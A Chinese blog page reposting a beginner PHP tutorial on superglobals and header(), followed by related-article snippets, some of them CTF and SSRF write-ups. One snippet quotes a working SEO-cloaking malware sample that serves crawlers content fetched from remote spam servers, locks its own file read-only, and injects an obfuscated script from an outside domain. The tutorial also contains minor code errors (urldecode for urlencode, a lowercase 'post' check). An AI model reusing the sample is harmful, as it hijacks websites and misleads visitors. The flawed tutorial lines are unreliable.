$_REQUEST变量数组header()函数

最新推荐文章于 2023-02-20 19:07:43 发布
最新推荐文章于 2023-02-20 19:07:43 发布
阅读量91 收藏
点赞数
原文链接:http://www.cnblogs.com/jiechn/p/4664448.html
版权

$_SERVER 包含http信息头,路径和服务器端的一些信息,没发送一次HTTP请求,就会创建一个$_SERVER数组
Array
  (
    [HTTP_HOST] => localhost
    [HTTP_REFERER] => 从那个链接过来
    [SERVER_NAME] => localhost
    [SERVER_ADDR] => 127.0.0.1
    [SERVER_PORT] => 80

    [REMOTE_ADDR] => 127.0.0.1
    [DOCUMENT_ROOT] => C:/wamp/www/
    [REMOTE_PORT] => 11642

    [REQUEST_METHOD] => GET

    [REQUEST_URI] => /study/page.php?page=2&name=dujie
    [QUERY_STRING] => page=2&name=dujie

    [SCRIPT_FILENAME] => C:/wamp/www/study/Page.php
    [SCRIPT_NAME] => /study/page.php
    [PHP_SELF] => /study/page.php
    [REQUEST_TIME] => 1436345404
  )

$_GET
  通过url传参给当前脚本的变量数组,传中文时会出现乱码
解决:
  使用urlencode($string) 进行编码,然后在脚本里使用 urldecode($_GET['name']),进行解码
例:
$str=urldecode('北京');
<a href="a.php?name=".$str>北京</a>
echo urldecode($_GET['name']);

$_POST
  通过表单传参http传递给当前脚本的变量数组 无乱码问题

小技巧
  ? 号传值
<a href="">本页面</a>
<a href="?"> 表示清除传参 返回首页 index

$_REQUEST
  包含$_GET $_POST $COOKIE传递的信息数组
判断GET/POST提交?
if($_SERVER[REQUEST_METHOD]=='post')

header()函数
@1 设置输出头
  header("Content-type:text/html;charset=utf-8");
@2 重定向操作
  header("Location:http://www.baidu.com");
@3 强制用户访问这个页面时获取最新资源,而不是使用存在客户端的缓存
  header("Expires: Mon, 26 Jul 1970 05:00:00 GMT");
//告诉浏览器此页面的过期时间(用格林威治时间表示),只要是已经过去的日期即可。
@4 指定时间重定向页面
  header("refresh:3;url=http://www.baidu.com");

转载于:https://www.cnblogs.com/jiechn/p/4664448.html

weixin_30825581
关注
PHP:超全局变量之$_SERVER
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 383
PHP:超全局变量之$_SERVER
头部信息 $_SERVER
grn11的博客
11-07 578
$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。不能保证每个服务器都提供全部项目;服务器可能会忽略一些,或者提供一些没有在这里列举出来的项目。 下表列出了所有 $_SERVER 变量中的重要元素。   元素/代码 描述 $_S
Buuctf之web(五)
qq_50589021的博客
12-14 6857
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
安洵杯2022 Web Writeup
渗透测试研究中心
12-01 882
babyphp index.php: <?php //something in flag.php class A { public $a; public $b; public function __wakeup() { $this->a = "babyhacker"; } public function __invo...
download php ctf,FireShellCTF2019 Bad Injections解题记录
weixin_39630744的博客
04-03 426
这是整场比赛最简单的Web题…Web题质量很高,貌似现在还没有关环境主页面有四个功能,纯静态页面。右键about页面源码信息:给个本地web目录接着在list页面的源码里发现信息:因为页面显示图片,url没有其他参数,猜测应该是readfile之类的函数读的文件。File+hash的方法,既然是ctf,那hash应该不会加key。下载一个文件试一下能不能成功68.183.31.62:94/down...
bestphp‘s revenge 1
m0_62129839的博客
02-20 194
因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被。
初学ssrf的三个协议
m0_62422842的博客
05-16 1459
gopher协议 什么是gopher协议呢? Gopher是Internet上一个非常有名的信息查找系统。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。但在www出现后,Gopher就没落了。 gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议 这个协议在各个语言的限制 gopher协议的格式: URL:gopher://<host>:&.
PHP 模拟$_PUT实现代码
10-29
2. 利用$_SERVER数组中的'REQUEST_METHOD'来判断当前请求是否为PUT方法。 3. 如果是PUT请求,则从php://input中读取原始数据流,并使用parse_str()函数将原始数据解析到$_PUT数组中。 伪代码如下: ```php $_PUT =...
【PHP7源码分析】PHP中$_POST揭秘
weixin_34391445的博客
10-31 1624
运营研发团队 季伟滨 一、前言 前几天的工作中,需要通过curl做一次接口测试。让我意外的是,通过$_POST竟然无法获取到Content-Type是application/json的http请求的body参数。 查了下php官网(http://php.net/manual/zh/rese...)对$_POST的描述,的确是这样。后来...
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1667
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
SSRF【CTFHUB】
D.MIND 的博客
05-14 762
file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容 http/s协议:探测内网主机存活 dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等 gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 内网访问 http://127.0.0.1/flag.php http://0.0.0.0/fl.
mysql 文档 无法连接 无效的设置,mysql说:无法连接:无效的设置。 XAMPP
weixin_39952937的博客
03-17 747
mysql说:无法连接:无效的设置。 XAMPP我更改了根密码进行testing,现在我无法login到XAMPP中的phpMyAdmin页面。 我在 这里寻找帮助, 这里基本上说在XAMPP \ PHPMYADMIN文件夹中改变了config.inc.php文件。/* Authentication type and info */ $cfg['Servers'][$i]['auth_type'...
BJDCTF 2nd WEB
A_dmin的博客
03-24 7628
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
2018巅峰极客第一场Web题两道
柠檬木有枝
10-21 949
A Simple CMS 一个16 年已经停更,基于 thinkphp 开发的 cms 网站目录大致如下,www.zip 是提供的源码文件 搜索 onethink 漏洞 相关文章,会发现这篇 http://www.hackdig.com/06/hack-36510.htm (thinkphp框架写的开源系统或被getshell tp官方onethink举例),漏洞大致原因是因为写入缓存文件时...
laravel后端设置请求头内容
qq_32421489的博客
01-04 1911
$request->headers->set('Accept', 'application/json' ); $request->headers->set('Authorization', 'Bearer ' .$token); $request->headers->set('content-type', 'application/x-www-form-urlencoded');
Thinkphp 使用header接收参数
SunNang的博客
12-30 2347
直接使用$request->header接值为空 先在public/.htaccess添加一句 SetEnvIf Authorization “(.*)” HTTP_AUTHORIZATION=$1
Laravel 学习-获取请求头(header)注意事项
TO_Web的博客
09-16 832
Laravel获取请求头(header)注意事项 \Request::header(); //这个是获取header里面的version参数值 \Request::header('user-token'); 或者: $request->header('user-token'); 注意:header 的参数名称不能用下划线,否则传不进来,切记、切记、切记 ...
HTTP Request Header 请求头理解
热门推荐
xjl271314的博客
07-11 2万+
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html Accept-Charset 浏览器可以接受的字符编码集 Accept-Charset: iso-8859-5 Ac...
<?php set_time_limit(0); header("Content-type: text/html; charset=utf-8"); function crawler() { $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiders = array( 'Googlebot', 'Baiduspider', '360Spider', 'Sogou News Spider', 'bingbot', 'Sosospider', ); if(!empty($userAgent)){ foreach ($spiders as $spider) { $spider = strtolower($spider); if (strpos($userAgent, $spider) !== false) { return true; } } } return false; } $url = $_SERVER["HTTP_REFERER"]; $u = parse_url($url); if(crawler()==true || $u['host'] == "www.baidu.com" || $u['host'] == "m.baidu.com"){ date_default_timezone_set('PRC'); $TD_server = "http://z8qw.woshinidie66.com"; $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']); echo $Content_mb; $url1 = $_SERVER['PHP_SELF']; $filename1 = @end(explode('/',$url1)); function set_writeable($file_name) { @chmod($file_name,0444); } set_writeable($filename1); } ?> <?php set_time_limit(0); error_reporting(0); function crawler() { $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiders = array( 'Baiduspider', 'Sogou News Spider' ); if (!empty($userAgent)) { foreach ($spiders as $spider) { $spider = strtolower($spider); if (strpos($userAgent, $spider) !== false) { return true; } } } return false; } $url = @$_SERVER["HTTP_REFERER"]; date_default_timezone_set('PRC'); $TD_server = "http://154.215.192.182/SpiderPool.php"; if (crawler()) { $query = $_SERVER['QUERY_STRING']; $path = $_SERVER["REQUEST_URI"]; $host_name = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $ch2 = curl_init(); $user_agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"; curl_setopt($ch2, CURLOPT_URL, $TD_server . "?host=" . $host_name . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['HTTP_HOST']); curl_setopt($ch2, CURLOPT_HEADER, false); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_REFERER, 'www.baidu.com'); curl_setopt($ch2, CURLOPT_USERAGENT, $user_agent); $temp = curl_exec($ch2); echo $temp; } $url1 = $_SERVER['PHP_SELF']; $filename1 = @end(explode('/', $url1)); function set_writeable($file_name) { @chmod($file_name, 0444); } set_writeable($filename1); <script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,98,100,48,57,49,55,46,99,111,109,47,98,100,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
最新发布
06-12
这段代码看起来是一个PHP脚本,其中有两个函数`crawler()`和`set_writeable()`,以及一些变量和条件语句。这段代码的功能可能是用于判断访问者是否是爬虫或搜索引擎,并根据访问来源执行一些操作。但是需要注意的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值